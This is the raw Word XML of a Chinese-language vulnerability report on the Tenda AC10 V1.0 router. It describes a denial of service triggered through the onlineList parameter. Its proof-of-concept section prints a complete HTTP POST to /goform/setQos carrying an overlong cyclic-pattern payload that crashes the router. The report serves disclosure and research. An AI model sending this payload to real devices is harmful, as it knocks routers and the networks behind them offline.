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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>概述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厂商网站：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.tenda.com.cn/default.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:color w:val="4183C4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>腾达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:color w:val="4183C4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Tenda)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:color w:val="4183C4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>官方网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:color w:val="4183C4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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固件下载地址：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.tenda.com.cn/download/detail-2734.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
        </w:rPr>
        <w:t>AC10V1.0升级软件_腾达(Tenda)官方网站</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>影响版本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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\Lee_ee\\AppData\\Local\\Temp\\ksohtml23052\\wps1.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4984750" cy="8318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2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>漏洞细节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans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Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在腾达路由器管理界面，用户管理处，通过向onlineList参数后接大量的数据，可以造成腾达服务端崩溃，拒绝服务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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>复现漏洞和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poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>：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为了复现此漏洞，可以通过一下步骤：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1.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通过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qemu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仿真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ac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  <w:t>10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路由器或购买一个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ac</w:t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  <w:t>10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型号的腾达路由器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2.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用以下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poc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攻击：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POST /goform/setQos HTTP/1.1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Host: tendawifi.com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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0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Accept: */*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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: application/x-www-form-urlencoded;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Content-Length: 1690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Origin: http://tendawifi.com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Connection: close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Referer: http://tendawifi.com/index.html</w:t>
      </w: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</w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="192" w:after="192"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="var(--monospace)" w:hAnsi="var(--monospace)" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>module1=onlineList&amp;onlineList=LAPTOP-P3VRLB65%09%09DC%3A1B%3AA1%3AD7%3A6F%3AF4%0938528.00%0938528.00%09trueaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaat&amp;module2=macFilter&amp;macFilterList=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poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会造成下图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="192" w:after="192"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\Lee_ee\\AppData\\Local\\Temp\\ksohtml23052\\wps3.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="31623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造成拒绝服务.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\Lee_ee\\AppData\\Local\\Temp\\ksohtml23052\\wps4.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r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var(--monospace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D8620A"/>
    <w:rsid w:val="00D8620A"/>
    <w:rsid w:val="00DB2D86"/>
    <w:rsid w:val="00EB14A7"/>
    <w:rsid w:val="00FF2B8E"/>
    <w:rsid w:val="68A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475</Words>
  <Characters>2714</Characters>
  <Lines>22</Lines>
  <Paragraphs>6</Paragraphs>
  <TotalTime>18</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3183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2022-07-05T17:27:00Z</dcterms:created>
  <dc:creator>L ee</dc:creator>
  <cp:lastModifiedBy>Lee_ee</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-05T18:16:31Z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A98E3BF6437E49918C19EC1FB3D4CD7B</vt:lpwstr>
  </property>
</Properties>
</file>